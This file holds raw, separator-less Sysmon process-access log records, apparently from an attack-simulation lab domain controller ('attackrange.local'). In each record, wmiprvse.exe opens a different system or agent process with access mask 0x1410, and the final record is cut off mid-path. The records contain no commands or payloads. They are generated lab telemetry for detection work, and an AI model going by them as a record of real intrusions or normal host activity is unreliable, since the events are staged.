15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program 